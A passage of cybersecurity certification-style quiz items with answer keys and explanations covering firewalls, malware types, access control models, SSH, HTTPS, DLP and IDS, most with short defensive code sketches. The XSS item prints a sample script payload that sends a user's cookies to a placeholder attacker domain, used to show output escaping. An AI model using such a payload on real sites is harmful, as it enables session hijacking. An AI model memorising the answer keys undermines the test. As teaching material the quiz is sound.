Question 141
Which type of firewall uses packet inspection along with stateful analysis to allow or block network traffic?
(A) Stateless firewall
(B) Stateful firewall
(C) Proxy firewall
(D) Web application firewall
Answer: B
Explanation:
A stateful firewall is a network security device that not only inspects the headers of incoming and outgoing packets but also evaluates each packet in the context of the connection it belongs to, keeping track of active connections or sessions. Unlike stateless firewalls, which filter packets solely based on predefined rules such as IP addresses, ports, and protocols, stateful firewalls maintain contextual awareness of ongoing communications. By tracking the state of active sessions, these firewalls can determine whether an incoming packet is part of an established connection or an unsolicited attempt to access the network. This capability allows stateful firewalls to enforce more intelligent security policies, dynamically allowing or denying traffic based on the context of network activity rather than simply applying static rules.
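To make the idea concrete, here is a minimal Python sketch of stateful filtering. It assumes a drastically simplified rule set and connection table (real firewalls track full 5-tuples, TCP flags, and timeouts); the addresses and ports are placeholders.

```python
# Minimal model of stateful filtering; rule set and session table are simplified.
ALLOWED_NEW = {("any", "203.0.113.10", 443)}  # rule: new connections to this server:port
sessions = set()                              # table of established connections

def handle_packet(src, dst, dport, syn):
    conn, reverse = (src, dst, dport), (dst, src, dport)
    if conn in sessions or reverse in sessions:
        return "ALLOW (established session)"        # context, not a static rule
    if syn and ("any", dst, dport) in ALLOWED_NEW:
        sessions.add(conn)                          # record the new session
        return "ALLOW (new connection per rule)"
    return "DROP (no matching rule or session)"

print(handle_packet("198.51.100.5", "203.0.113.10", 443, syn=True))   # new, allowed
print(handle_packet("203.0.113.10", "198.51.100.5", 443, syn=False))  # reply, allowed
print(handle_packet("192.0.2.99", "203.0.113.10", 22, syn=True))      # blocked
```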
Stateful firewalls differ from other types of firewalls in both scope and operation. Proxy firewalls operate at the application layer and act as intermediaries between clients and servers, inspecting requests and responses in detail, while web application firewalls (WAFs) focus specifically on protecting web applications from threats such as SQL injection, cross-site scripting, and other application-layer attacks. While these firewalls provide specialized protection, stateful firewalls are particularly effective for general network traffic control because they can validate that packets belong to legitimate, ongoing connections, thereby preventing spoofing, session hijacking, and unauthorized access attempts.
The advantages of stateful firewalls extend to their ability to dynamically adapt to network conditions and monitor session integrity, which enhances overall security posture. Administrators are encouraged to combine firewall rules with regular software updates, intrusion detection systems, and continuous monitoring to ensure a comprehensive defense strategy. Proper configuration is critical and involves defining allowed protocols, specifying trusted sources and destinations, and logging suspicious or anomalous activity.
By maintaining awareness of connection states and analyzing traffic context, stateful firewalls provide a robust layer of perimeter defense that goes beyond simple packet filtering. They protect networks from unauthorized access, mitigate the risk of attacks, and support secure and reliable communication for legitimate users while enabling administrators to respond proactively to potential threats.
Question 142
Which attack manipulates a user into clicking a malicious link or attachment to steal credentials or sensitive information?
(A) Phishing
(B) DDoS
(C) Brute force
(D) SQL injection
Answer: A
Explanation:
Phishing is a form of social engineering attack that aims to manipulate individuals into revealing sensitive information such as login credentials, credit card numbers, or other personal data. Unlike technical attacks that target software vulnerabilities or network infrastructure, phishing primarily exploits human behavior. Attackers often craft emails, text messages, or fake websites that appear authentic, imitating trusted organizations, colleagues, or services. The objective is to convince recipients to take unsafe actions, such as clicking on malicious links, downloading infected attachments, or entering confidential information into fraudulent forms.
Phishing attacks differ from other types of cyber threats in their approach. Distributed denial-of-service (DDoS) attacks focus on overwhelming network resources to disrupt services, brute force attacks attempt to gain unauthorized access by systematically guessing passwords, and SQL injection attacks exploit database vulnerabilities by inserting malicious queries. Phishing, on the other hand, relies on deception and manipulation, often exploiting emotions such as fear, urgency, or curiosity to prompt victims to act quickly without carefully evaluating the legitimacy of the request.
Organizations combat phishing through a combination of technological controls and user education. Employee awareness training is essential, helping staff recognize suspicious emails, messages, or links and respond appropriately. Email filtering solutions can identify and block known phishing attempts before they reach users’ inboxes, while multi-factor authentication adds an additional layer of security, making it more difficult for attackers to access accounts even if credentials are compromised. Incident response planning ensures that organizations can react quickly to phishing attempts, minimizing potential damage.
Phishing attacks have become increasingly sophisticated, with advanced methods such as spear-phishing targeting specific individuals and clone phishing replicating legitimate messages to increase credibility. Continuous monitoring of email traffic, real-time alerts, and proactive threat intelligence help organizations detect and respond to suspicious activity promptly. By combining education, technical safeguards, and vigilant monitoring, organizations can reduce the risk of data compromise, account takeover, and financial or reputational loss caused by phishing attacks.
Question 143
Which type of malware encrypts a victim’s data and demands a ransom for the decryption key?
(A) Ransomware
(B) Trojan
(C) Worm
(D) Adware
Answer: A
Explanation:
Ransomware is a type of malicious software designed to deny users access to their data or systems by encrypting files, rendering them unusable until a ransom is paid. Payments are typically demanded in cryptocurrency to maintain the anonymity of attackers. Unlike other forms of malware, ransomware specifically focuses on extortion and disruption, rather than spreading silently or performing covert activities. For example, Trojans are malicious programs that often disguise themselves as legitimate software to gain access to systems, while worms replicate themselves across networks without direct user interaction. Adware, in contrast, primarily serves advertisements and usually does not compromise critical data or system functionality.
Ransomware commonly spreads through several attack vectors, including phishing emails, malicious file downloads, and exploitation of unpatched software vulnerabilities. Attackers often leverage social engineering to trick users into executing malicious attachments or links, making user behavior a key factor in prevention. Once executed, ransomware encrypts targeted files or entire systems and typically leaves instructions demanding payment in exchange for decryption keys. Some advanced variants use polymorphic code or evasion techniques to avoid detection by traditional antivirus or endpoint security solutions, increasing the likelihood of a successful attack.
Mitigation strategies for ransomware rely on both proactive and reactive measures. Robust backup solutions are essential to ensure that critical data can be restored without paying a ransom. Endpoint protection software, patch management, and network segmentation help prevent initial infection and limit the spread of malware within an organization. User education and awareness are equally important, as training staff to recognize suspicious emails or downloads can significantly reduce risk.
Organizations should also have a well-prepared incident response plan in place. This plan should include isolating infected systems to prevent lateral movement, analyzing the behavior of the malware to understand its impact, and coordinating with law enforcement or cybersecurity experts as needed. Integrating threat intelligence and continuous monitoring enhances the ability to detect and respond to emerging ransomware strains. By employing a multi-layered defense strategy, organizations can reduce the likelihood of successful ransomware attacks and mitigate their potential impact on operations and data integrity.
Question 144
Which access control model grants permissions based on a user’s role within an organization?
(A) Discretionary Access Control (DAC)
(B) Mandatory Access Control (MAC)
(C) Role-Based Access Control (RBAC)
(D) Attribute-Based Access Control (ABAC)
Answer: C
Explanation:
Role-Based Access Control (RBAC) is a widely used access management model that simplifies the process of granting and managing permissions within an organization. Rather than assigning permissions to individual users on a case-by-case basis, RBAC assigns access rights based on predefined roles that correspond to specific job functions, responsibilities, or organizational positions. For example, an employee in the finance department might be assigned a “Finance Analyst” role, which automatically grants the permissions necessary to access financial records, reports, and related systems. By linking access privileges to roles instead of individual users, RBAC ensures that employees have the permissions they need to perform their work without over-provisioning access, which helps reduce security risks.
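As a rough illustration of how role-to-permission mapping might look in code, consider the following sketch; the role names, users, and permission strings are invented for the example.

```python
# Minimal RBAC sketch: permissions attach to roles, users receive roles.
ROLE_PERMISSIONS = {
    "finance_analyst": {"read_financial_records", "run_reports"},
    "hr_manager":      {"read_employee_files", "approve_leave"},
}
USER_ROLES = {"alice": {"finance_analyst"}, "bob": {"hr_manager"}}

def is_authorized(user, permission):
    """Grant access if any of the user's roles carries the permission."""
    return any(permission in ROLE_PERMISSIONS.get(role, set())
               for role in USER_ROLES.get(user, set()))

print(is_authorized("alice", "run_reports"))          # True
print(is_authorized("alice", "read_employee_files"))  # False: not in her role
```

Changing what a "Finance Analyst" may do then means editing one role definition rather than touching every individual account.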
RBAC differs from other access control models in important ways. Discretionary Access Control (DAC) allows users to determine who can access resources they own, giving individual users control over permissions. Mandatory Access Control (MAC), on the other hand, enforces strict, system-defined rules based on security labels or classifications, limiting access according to policy rather than user discretion. Attribute-Based Access Control (ABAC) evaluates access requests dynamically based on attributes such as user location, device type, time of access, or other contextual information. RBAC stands out because of its simplicity and scalability, making it particularly suitable for large organizations with complex access requirements.
Implementing RBAC effectively requires careful planning. Organizations must define roles clearly, specifying the exact permissions associated with each role and aligning them with job responsibilities. Regular reviews of role assignments and permissions are necessary to prevent privilege creep, where users accumulate access rights they no longer need. Auditing role assignments and tracking changes also helps ensure compliance with internal policies and external regulatory requirements.
RBAC offers significant operational and security advantages. It reduces administrative overhead by streamlining permission management, ensures consistent policy enforcement across the organization, and enhances security by minimizing unnecessary privileges. By providing a structured, scalable approach to access control, RBAC enables organizations to manage user permissions efficiently, maintain compliance, and protect sensitive systems and data from unauthorized access.
Question 145
Which protocol provides secure encrypted communication for remote administration of network devices?
(A) Telnet
(B) SSH
(C) FTP
(D) HTTP
Answer: B
Explanation:
Secure Shell, commonly known as SSH, is a cryptographic network protocol designed to provide secure communication between a client and a network device over potentially untrusted networks. Unlike older protocols such as Telnet, which transmit credentials and commands in plaintext, SSH encrypts all data exchanged between the client and server, ensuring both confidentiality and integrity. This encryption protects sensitive information, including login credentials and administrative commands, from being intercepted or tampered with by malicious actors. Similarly, protocols like FTP and HTTP lack native encryption, making them vulnerable to eavesdropping, data manipulation, and credential theft. By contrast, SSH establishes a secure channel through which network administrators can safely manage systems remotely.
SSH leverages public-key cryptography for authentication, allowing clients to verify the identity of the server and, optionally, servers to authenticate users through key-based methods instead of relying solely on passwords. This approach enhances security by mitigating the risk of credential compromise and reducing reliance on weak or reused passwords. Beyond authentication, SSH also supports secure tunnels for transmitting arbitrary network traffic, including port forwarding, which enables encrypted access to services that would otherwise be exposed in plaintext.
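A short sketch of key-based SSH administration, assuming the third-party paramiko library is installed (pip install paramiko); the device hostname, username, key path, and command are placeholders, not real values.

```python
# Hedged sketch of key-based remote administration over SSH using paramiko.
import paramiko

client = paramiko.SSHClient()
client.load_system_host_keys()                               # trust known_hosts entries
client.set_missing_host_key_policy(paramiko.RejectPolicy())  # refuse unknown hosts

client.connect("router.example.com", username="admin",
               key_filename="/home/admin/.ssh/id_ed25519")   # key-based authentication
stdin, stdout, stderr = client.exec_command("show version")  # encrypted channel
print(stdout.read().decode())
client.close()
```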
Network administrators widely rely on SSH to manage critical devices such as routers, switches, firewalls, and servers. Its ability to provide secure remote administration is particularly valuable in modern environments where systems may be accessed over the internet or other untrusted networks. Implementing SSH securely requires adherence to best practices, including careful key management, disabling outdated or vulnerable protocol versions, enforcing strong password policies, and monitoring for unauthorized access attempts or suspicious activity.
Question 146
Which malware type spreads automatically across networks without user interaction?
(A) Worm
(B) Trojan
(C) Rootkit
(D) Spyware
Answer: A
Explanation:
A worm is a type of malicious software that is capable of self-replication and self-propagation across networks without requiring direct user intervention. Unlike Trojans, which typically rely on social engineering to trick users into executing malicious files, worms can spread automatically by exploiting vulnerabilities in operating systems, network protocols, or applications. Worms differ from rootkits, which focus on concealing the presence of malware within a system, and spyware, which is designed to gather sensitive information without detection. The primary characteristic that distinguishes worms is their ability to distribute themselves rapidly and widely, often causing significant network congestion and resource depletion.
Once a worm infects a system, it may carry additional payloads, such as ransomware, backdoors, or keyloggers, which further compromise affected systems and increase the overall damage. Worms can propagate through email attachments, file-sharing networks, unpatched software vulnerabilities, or misconfigured network services. Their self-replicating nature allows them to spread faster than many other types of malware, making early detection and mitigation critical to limiting impact.
Defending against worms requires a combination of preventive, detective, and corrective strategies. Preventive measures include regular patch management to fix known vulnerabilities, network segmentation to limit propagation, and the use of endpoint protection software to block known threats. Detective controls involve monitoring network traffic patterns for unusual activity, deploying intrusion detection systems, and performing regular system audits to identify early signs of infection. Corrective measures, such as isolating infected systems and performing thorough remediation, help contain outbreaks and prevent further compromise.
Organizations also need to remain vigilant about zero-day vulnerabilities that worms may exploit before patches are available. Rapid incident response, combined with ongoing security awareness and user education, strengthens an organization’s ability to respond effectively to worm outbreaks. By integrating these measures, organizations can reduce operational disruption, minimize data loss, and maintain network integrity, ensuring that worm-related threats are managed proactively and efficiently.
Question 147
Which authentication factor relies on a unique physical characteristic of a user?
(A) Password
(B) Token
(C) Biometric
(D) Smart card
Answer: C
Explanation:
Biometric authentication is a security mechanism that verifies a user’s identity based on unique physiological or behavioral traits. Common examples include fingerprints, iris patterns, facial recognition, voiceprints, and even gait or typing patterns. Unlike traditional knowledge-based authentication, such as passwords, which can be guessed or stolen, or possession-based factors like tokens or smart cards, which can be lost or duplicated, biometric identifiers are inherently tied to the individual and are therefore much harder to replicate or share. This inherent uniqueness enhances security, making biometric authentication a valuable component in modern access control systems.
The implementation of biometric systems requires careful consideration of several factors. One key concern is accuracy, often measured by false acceptance rates (FAR) and false rejection rates (FRR). False acceptance occurs when an unauthorized user is incorrectly verified as legitimate, while false rejection happens when a legitimate user is denied access. Ensuring a low FAR without significantly increasing the FRR is critical for balancing security and usability. Other considerations include the secure storage and protection of biometric templates, which represent the user’s biometric data in a digital format. If these templates are compromised, they cannot be simply “reset” like a password, making encryption and template protection essential. Privacy concerns also play a significant role, as biometric data is highly sensitive and must be handled in accordance with data protection regulations. Environmental factors, such as lighting conditions, fingerprint cleanliness, or background noise, can also affect biometric system performance and must be accounted for during deployment.
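The FAR/FRR trade-off can be shown with a toy computation; the matcher scores below are made-up values, and the thresholds are arbitrary.

```python
# Illustrative FAR/FRR computation from matcher similarity scores.
genuine_scores  = [0.91, 0.88, 0.73, 0.95, 0.69]   # same-person comparisons
impostor_scores = [0.12, 0.41, 0.63, 0.08, 0.30]   # different-person comparisons

def far_frr(threshold):
    # FAR: fraction of impostor attempts wrongly accepted (score >= threshold)
    far = sum(s >= threshold for s in impostor_scores) / len(impostor_scores)
    # FRR: fraction of genuine attempts wrongly rejected (score < threshold)
    frr = sum(s < threshold for s in genuine_scores) / len(genuine_scores)
    return far, frr

for t in (0.5, 0.7, 0.9):
    far, frr = far_frr(t)
    print(f"threshold={t}: FAR={far:.2f}, FRR={frr:.2f}")  # raising t trades FAR for FRR
```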
Biometric authentication is often used in combination with other authentication methods as part of multi-factor authentication (MFA). For example, a system might require both a fingerprint scan and a password, or facial recognition combined with a hardware token. This layered approach increases security by requiring multiple independent factors for access. Proper deployment includes secure enrollment procedures, encryption of biometric data, regular system maintenance, and monitoring for unauthorized access attempts. When implemented effectively, biometrics provide a reliable, user-friendly, and highly secure method for verifying identity in enterprise networks, cloud environments, financial systems, and other critical applications.
Question 148
Which attack targets a web application by inserting malicious scripts into pages viewed by other users?
(A) SQL injection
(B) Cross-Site Scripting (XSS)
(C) DDoS
(D) Phishing
Answer: B
Explanation:
Cross-Site Scripting (XSS) is a type of web application vulnerability that occurs when an attacker is able to inject malicious scripts into web pages viewed by other users. These scripts execute within the context of the victim’s browser, effectively allowing the attacker to interact with the user’s session, manipulate webpage content, or steal sensitive information such as session cookies, authentication tokens, or personal data. Unlike SQL injection, which targets backend databases, or Distributed Denial-of-Service (DDoS) attacks, which overwhelm networks, XSS specifically exploits the way a web application processes and displays input, making it a client-side threat. Similarly, phishing attacks rely on social engineering to trick users into providing credentials, whereas XSS operates silently within legitimate user sessions, often without the victim’s awareness.
The root cause of XSS vulnerabilities is usually inadequate input validation and improper output encoding within web applications. Web applications that fail to properly sanitize user input or escape dynamic content before rendering it in a browser create opportunities for attackers to inject scripts. There are several types of XSS, including stored XSS, where malicious scripts are permanently stored on a server and delivered to all users who access the affected page; reflected XSS, where scripts are embedded in URLs and executed when users click malicious links; and DOM-based XSS, where scripts manipulate the Document Object Model on the client side.
Mitigating XSS requires a combination of secure coding practices, input validation, and output encoding. Developers should ensure that user-provided data is properly sanitized before being processed or displayed, and they should implement Content Security Policies (CSPs) to restrict the execution of untrusted scripts. Regular code reviews, penetration testing, and automated security scanning can help identify vulnerabilities before they are exploited. User awareness and security training are also essential, as they complement technical controls by reducing risky behavior. By addressing these factors, organizations can significantly reduce the risk of XSS attacks, protecting sensitive data, maintaining user trust, and ensuring the integrity of their web applications.
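A minimal example of output encoding using Python's standard library; the comment string is a contrived attack payload for demonstration only.

```python
# Output encoding: render untrusted input as inert text, not executable markup.
from html import escape

user_comment = '<script>document.location="https://evil.example/?c="+document.cookie</script>'

# Unsafe: interpolating raw input would let the script run in visitors' browsers.
unsafe_html = f"<p>{user_comment}</p>"

# Safe: escaping converts <, >, &, and quotes to entities, so the payload displays as text.
safe_html = f"<p>{escape(user_comment)}</p>"
print(safe_html)
```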
Question 149
Which security solution monitors sensitive data to prevent unauthorized transfer through email, cloud services, or removable devices?
(A) VPN
(B) Firewall
(C) Data Loss Prevention (DLP)
(D) IDS
Answer: C
Explanation:
Data Loss Prevention (DLP) is a set of technologies and practices designed to detect, monitor, and prevent the unauthorized transmission or exposure of sensitive information across an organization’s network and endpoints. Unlike Virtual Private Networks (VPNs), which secure remote connections, or firewalls, which primarily control the flow of network traffic, DLP focuses specifically on the content of data and ensures that confidential information does not leave the organization through unapproved channels. Similarly, Intrusion Detection Systems (IDS) can alert administrators to suspicious activity but typically do not actively prevent sensitive data from being leaked. DLP solutions, by contrast, provide proactive mechanisms to enforce policies that govern the handling and movement of critical data.
A DLP system typically works by identifying and categorizing sensitive information such as personally identifiable information (PII), financial records, intellectual property, and proprietary business documents. Once classified, DLP can enforce security policies that restrict access, require encryption, or prevent certain types of data from being transmitted via email, web uploads, or removable storage devices. These systems can be deployed across endpoints, network gateways, and cloud environments to provide comprehensive coverage and ensure that sensitive data is protected regardless of where it resides or how it is used.
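In the spirit of such content inspection, here is a toy outbound scan; the regular expressions are simplified examples, nowhere near production-grade detectors.

```python
# Toy DLP-style content inspection; patterns are deliberately simplistic.
import re

PATTERNS = {
    "credit_card": re.compile(r"\b(?:\d[ -]?){13,16}\b"),
    "us_ssn":      re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
}

def scan_outbound(text):
    """Return the names of any sensitive-data patterns found in outbound content."""
    return [name for name, rx in PATTERNS.items() if rx.search(text)]

email_body = "Invoice attached. Card: 4111 1111 1111 1111, SSN 123-45-6789."
hits = scan_outbound(email_body)
if hits:
    print(f"BLOCK: message matches DLP policies {hits}")  # enforce, log, and alert
```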
Effective DLP implementation also requires careful policy design, user education, and continuous monitoring. Organizations must train employees on proper data handling practices, keep policies up to date with evolving compliance requirements, and review logs and alerts to detect potential policy violations. DLP solutions often integrate with other security systems such as Security Information and Event Management (SIEM) platforms and endpoint protection tools, enhancing overall organizational defense by providing centralized visibility and automated enforcement.
Organizations leverage DLP to protect intellectual property, maintain regulatory compliance, and reduce the risk of both accidental and malicious data exfiltration. By combining monitoring, enforcement, and user awareness, DLP solutions help organizations maintain control over their sensitive information, minimize exposure to breaches, and support a culture of secure data handling across all levels of the enterprise.
Question 150
Which protocol ensures secure web communication by encrypting traffic between clients and servers?
(A) HTTP
(B) HTTPS
(C) FTP
(D) Telnet
Answer: B
Explanation:
Hypertext Transfer Protocol Secure, commonly known as HTTPS, is an essential protocol for securing web communications by encrypting data in transit. It uses Transport Layer Security (TLS) to protect information exchanged between a client, such as a web browser, and a web server, ensuring confidentiality, integrity, and authenticity. Unlike HTTP, which transmits data in plaintext and is vulnerable to interception or manipulation, HTTPS safeguards sensitive information such as login credentials, payment details, and personal user data. Other protocols like FTP and Telnet also lack built-in encryption, exposing data to eavesdropping and potential misuse, whereas HTTPS provides a secure communication channel over public and private networks.
HTTPS establishes trust through the use of digital certificates issued by trusted Certificate Authorities (CAs). These certificates authenticate the identity of the web server, assuring users that they are communicating with the intended service rather than a malicious actor performing a man-in-the-middle attack. The protocol also supports strong cryptographic algorithms and cipher suites, ensuring that data cannot be easily decrypted or tampered with during transmission. The combination of encryption and authentication makes HTTPS a critical component in protecting sensitive web transactions and maintaining user trust.
For organizations, proper deployment of HTTPS involves careful certificate management, secure configuration, and continuous monitoring. Certificates must be obtained from reputable CAs, regularly renewed, and correctly installed to prevent issues such as expired or misconfigured certificates that could undermine security. Configuring TLS to use strong cipher suites, disabling outdated protocol versions, and enabling features like HTTP Strict Transport Security (HSTS) further enhance protection against attacks. Continuous monitoring helps detect anomalies, certificate issues, or attempted intrusions.
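The following sketch shows a hardened client-side TLS configuration with Python's built-in ssl module; the hostname is a placeholder.

```python
# Client-side TLS with certificate verification and a modern protocol floor.
import socket, ssl

ctx = ssl.create_default_context()            # verifies certificates against trusted CAs
ctx.minimum_version = ssl.TLSVersion.TLSv1_2  # refuse outdated protocol versions

with socket.create_connection(("www.example.com", 443)) as sock:
    with ctx.wrap_socket(sock, server_hostname="www.example.com") as tls:
        # server_hostname enables SNI and hostname checking against the certificate
        print(tls.version())                  # e.g. 'TLSv1.3'
        print(tls.getpeercert()["subject"])   # identity asserted by the CA-signed cert
```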
By implementing HTTPS across websites and web applications, organizations can ensure that data remains private, unaltered, and sent to legitimate endpoints. It not only protects sensitive user information but also supports compliance with data protection regulations and modern cybersecurity frameworks, making it a fundamental standard for secure online communication.
Question 151
Which malware hides its presence on a system to maintain persistent unauthorized access?
(A) Rootkit
(B) Trojan
(C) Worm
(D) Spyware
Answer: A
Explanation:
Rootkits are a type of malicious software designed to gain unauthorized control over a computer system while remaining hidden from detection. They achieve this by manipulating core operating system functions, processes, and system logs, effectively concealing their presence and any additional malicious activity they facilitate. Unlike Trojans, which rely on disguising themselves as legitimate software to trick users into installation, or worms, which propagate across networks independently, rootkits are primarily focused on persistence and stealth. Spyware, on the other hand, quietly collects information from a system, but does not typically offer the level of control or concealment that rootkits provide.
The dangers of rootkits are significant because they enable attackers to maintain long-term access to compromised systems. Once installed, a rootkit can allow the attacker to install additional malware, exfiltrate sensitive data, manipulate system operations, or establish backdoors for future intrusion. The stealthy nature of rootkits means that standard security measures may not detect them, making early identification and mitigation a challenge. Detection often requires specialized tools, such as rootkit scanners, memory forensics, integrity monitoring, and behavioral analysis of system activity to identify anomalies that indicate hidden threats.
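One of the detection approaches mentioned above, file-integrity monitoring, can be sketched in a few lines; the monitored paths are examples only, and real tools also protect the baseline itself from tampering.

```python
# Simplified file-integrity check: compare current hashes to a known-good baseline.
import hashlib

MONITORED = ["/bin/ls", "/usr/sbin/sshd"]   # example paths

def fingerprint(paths):
    """Return a {path: sha256} map for comparison against a known-good baseline."""
    out = {}
    for p in paths:
        with open(p, "rb") as f:
            out[p] = hashlib.sha256(f.read()).hexdigest()
    return out

baseline = fingerprint(MONITORED)   # captured while the system is known-clean
# ... later, on a schedule or during an investigation:
current = fingerprint(MONITORED)
for path in MONITORED:
    if current[path] != baseline[path]:
        print(f"ALERT: {path} changed on disk")  # possible tampering; investigate offline
```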
Preventing rootkit infections requires a proactive, multi-layered approach to system security. Organizations should maintain regular patch management to close vulnerabilities that rootkits could exploit and limit administrative access to reduce the potential attack surface. Endpoint protection solutions can help detect suspicious behaviors, while frequent system audits and integrity checks ensure that unauthorized changes are identified promptly. Implementing robust monitoring and incident response procedures further enhances the ability to respond quickly to detected threats, limiting the potential damage caused by rootkits.
Question 152
Which principle ensures that a user has only the minimum privileges necessary to perform job tasks?
(A) Need-to-Know
(B) Principle of Least Privilege
(C) Defense in Depth
(D) Separation of Duties
Answer: B
Explanation:
The Principle of Least Privilege (PoLP) is a fundamental concept in cybersecurity that emphasizes granting users, applications, and systems only the minimum level of access necessary to perform their specific job functions. By restricting permissions to what is strictly required, organizations can significantly reduce the risk of accidental or intentional misuse of systems and data. This approach not only limits the potential for internal threats, such as insider abuse or human error, but also mitigates the impact of external attacks, including those that attempt to escalate privileges or move laterally within a network after initial compromise.
Unlike the Need-to-Know principle, which restricts access to specific information based on relevance, or Separation of Duties, which divides critical functions among multiple individuals to prevent conflicts of interest, the Principle of Least Privilege focuses broadly on minimizing access rights across all systems. Similarly, Defense in Depth involves layering multiple security controls to provide overlapping protection, while least privilege specifically targets access management as a core line of defense. By applying this principle, organizations can reduce their attack surface, limit opportunities for privilege escalation, and ensure that sensitive systems and data remain protected even if one component of the network is compromised.
Implementing least privilege effectively requires a structured and ongoing approach. Role-Based Access Control (RBAC) is commonly used to assign permissions based on job roles, ensuring consistency and reducing administrative complexity. Periodic access reviews and audits are critical to identify and remove unnecessary permissions, particularly as employees change roles or leave the organization. Logging and monitoring user activity further enhance enforcement by allowing security teams to detect unusual behavior or policy violations in real time.
Beyond security, adhering to the Principle of Least Privilege also supports regulatory compliance and governance requirements by demonstrating that access controls are carefully managed and monitored. In essence, least privilege serves as a foundational cybersecurity practice, providing a proactive means of controlling access, limiting risk, and safeguarding sensitive data and critical systems across an organization.
Question 153
Which attack attempts to guess passwords by systematically trying all possible combinations?
(A) Brute Force
(B) Phishing
(C) SQL injection
(D) DDoS
Answer: A
Explanation:
A brute force attack is a method used by attackers to gain unauthorized access to systems by systematically attempting every possible combination of usernames and passwords until the correct credentials are discovered. This type of attack targets authentication mechanisms directly and relies on computational power or automation to try large numbers of potential passwords, making weak or commonly used passwords particularly vulnerable. Unlike phishing, which deceives users into voluntarily providing credentials, or SQL injection, which exploits vulnerabilities in databases, brute force attacks exploit deficiencies in authentication systems. Similarly, Distributed Denial of Service (DDoS) attacks aim to overwhelm network or server resources rather than attempt to guess credentials.
The effectiveness of brute force attacks is influenced by factors such as password complexity, password length, and the implementation of account security measures. Systems that allow unlimited login attempts or use outdated or weak password hashing algorithms are at higher risk. Attackers may also use distributed methods, leveraging botnets or multiple machines to conduct attacks more efficiently and avoid detection. These advanced approaches increase the speed and scale at which credentials can be guessed, amplifying the potential threat to sensitive systems.
Mitigation strategies against brute force attacks involve a combination of preventive, detective, and corrective measures. Enforcing strong password policies that require complex, unique passwords significantly reduces the likelihood of successful attacks. Account lockout mechanisms or delayed login responses after multiple failed attempts slow down or prevent automated guessing. Multi-factor authentication adds an additional layer of security, ensuring that even if a password is compromised, access cannot be gained without another form of verification. Monitoring and analyzing authentication logs can detect unusual login patterns, helping security teams respond quickly to potential attacks.
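A minimal sketch of the lockout idea described above; the thresholds and the in-memory store are illustrative choices, not recommendations.

```python
# Account-lockout sketch: throttle repeated failed logins per username.
import time

MAX_ATTEMPTS = 5
LOCKOUT_SECONDS = 900
failures = {}   # username -> (failure count, time of last failure)

def check_login(username, password_ok):
    count, last = failures.get(username, (0, 0.0))
    if count >= MAX_ATTEMPTS and time.time() - last < LOCKOUT_SECONDS:
        return "LOCKED: too many failed attempts, try later"
    if password_ok:
        failures.pop(username, None)          # reset counter on success
        return "OK"
    failures[username] = (count + 1, time.time())
    return "DENIED"

for _ in range(6):
    print(check_login("alice", password_ok=False))  # sixth call reports LOCKED
```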
Employee training and security awareness also play a key role in mitigating brute force attacks by emphasizing the importance of secure passwords and cautious handling of credentials. By combining technical controls, monitoring, and user education, organizations can effectively reduce the risk and impact of brute force attacks, safeguarding critical systems and sensitive data from unauthorized access.
Question 154
Which security measure detects abnormal activity in a network and alerts administrators in real time?
(A) IDS
(B) Firewall
(C) VPN
(D) DLP
Answer: A
Explanation:
An Intrusion Detection System (IDS) is a cybersecurity solution designed to monitor network traffic and system activities for signs of malicious behavior, policy violations, or abnormal activity. The primary purpose of an IDS is to identify potential threats in real time and generate alerts for security administrators, enabling them to investigate and respond promptly before significant damage occurs. Unlike firewalls, which actively block or allow traffic based on predefined rules, an IDS primarily functions as a detection and alerting mechanism. Similarly, Virtual Private Networks (VPNs) focus on securing remote communications, while Data Loss Prevention (DLP) solutions aim to prevent sensitive information from leaving the network. IDS complements these tools by providing visibility into potential threats that bypass preventive controls.
IDS solutions can be categorized into two main types: signature-based and anomaly-based. Signature-based IDS rely on a database of known attack patterns and generate alerts when matching traffic is detected. While highly effective against known threats, they may fail to detect novel attacks. Anomaly-based IDS, on the other hand, establish a baseline of normal system or network behavior and flag deviations that could indicate malicious activity. This approach allows for the detection of previously unseen threats but can generate false positives if normal activity changes unexpectedly. Combining both methods can improve detection coverage and accuracy.
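A toy anomaly-based rule might look like the following; the sample traffic counts and the 3-sigma threshold are illustrative, and real systems baseline many features, not one.

```python
# Toy anomaly detector: flag traffic volumes far from a learned baseline.
from statistics import mean, stdev

baseline_requests_per_min = [120, 135, 110, 128, 142, 125, 131]  # "normal" observations
mu, sigma = mean(baseline_requests_per_min), stdev(baseline_requests_per_min)

def is_anomalous(observed):
    return abs(observed - mu) > 3 * sigma   # simple z-score style rule

for obs in (130, 480):
    if is_anomalous(obs):
        print(f"ALERT: {obs} req/min deviates from baseline (mu={mu:.0f})")
```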
Effective IDS deployment requires integration with logging systems, monitoring tools, and incident response workflows. Continuous updates to signature databases, regular tuning of detection parameters, and correlation with other security solutions such as Security Information and Event Management (SIEM) systems enhance the IDS’s ability to provide actionable alerts while minimizing false positives. By improving visibility into network traffic and user activity, IDS enables organizations to proactively identify and mitigate potential threats, respond rapidly to incidents, and strengthen overall cybersecurity posture. Properly managed, an IDS serves as a critical component in layered security strategies, complementing preventive measures and supporting comprehensive risk management efforts.
Question 155
Which access control model enforces system-defined rules that cannot be altered by users?
(A) Mandatory Access Control (MAC)
(B) Discretionary Access Control (DAC)
(C) Role-Based Access Control (RBAC)
(D) Attribute-Based Access Control (ABAC)
Answer: A
Explanation:
Mandatory Access Control (MAC) is a highly structured access control model in which the system enforces strict rules governing access to resources, and users cannot alter these permissions. Unlike Discretionary Access Control (DAC), where resource owners have the authority to grant or revoke access to their data, MAC relies on centralized, system-defined policies that dictate who can access specific information based on security labels or classifications. Similarly, Role-Based Access Control (RBAC) assigns permissions according to predefined roles within an organization, while Attribute-Based Access Control (ABAC) determines access based on dynamic attributes such as time, location, or device type. MAC stands out for its rigidity and predictability, making it particularly suitable for environments where confidentiality, integrity, and security are critical.
Implementation of MAC involves several key steps. Each piece of data or resource is assigned a security label reflecting its sensitivity level. Users are also classified according to clearance levels, and access is granted only when a user’s clearance meets or exceeds the data’s classification. MAC policies are enforced through the operating system or security software, preventing users from modifying permissions or bypassing restrictions. Integration with authentication systems ensures that users are properly identified and verified before access decisions are applied.
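The clearance-versus-label check can be sketched as follows (a Bell-LaPadula-flavored "no read up" rule); the label hierarchy and the sample subjects and objects are illustrative.

```python
# MAC-style check: the system, not the user, decides via labels and clearances.
LEVELS = {"public": 0, "confidential": 1, "secret": 2, "top_secret": 3}

user_clearance = {"alice": "secret", "bob": "confidential"}
object_label   = {"budget.xlsx": "confidential", "ops_plan.doc": "top_secret"}

def can_read(user, obj):
    # Access is granted only if clearance dominates the object's classification;
    # users cannot modify these labels, which is what makes the control mandatory.
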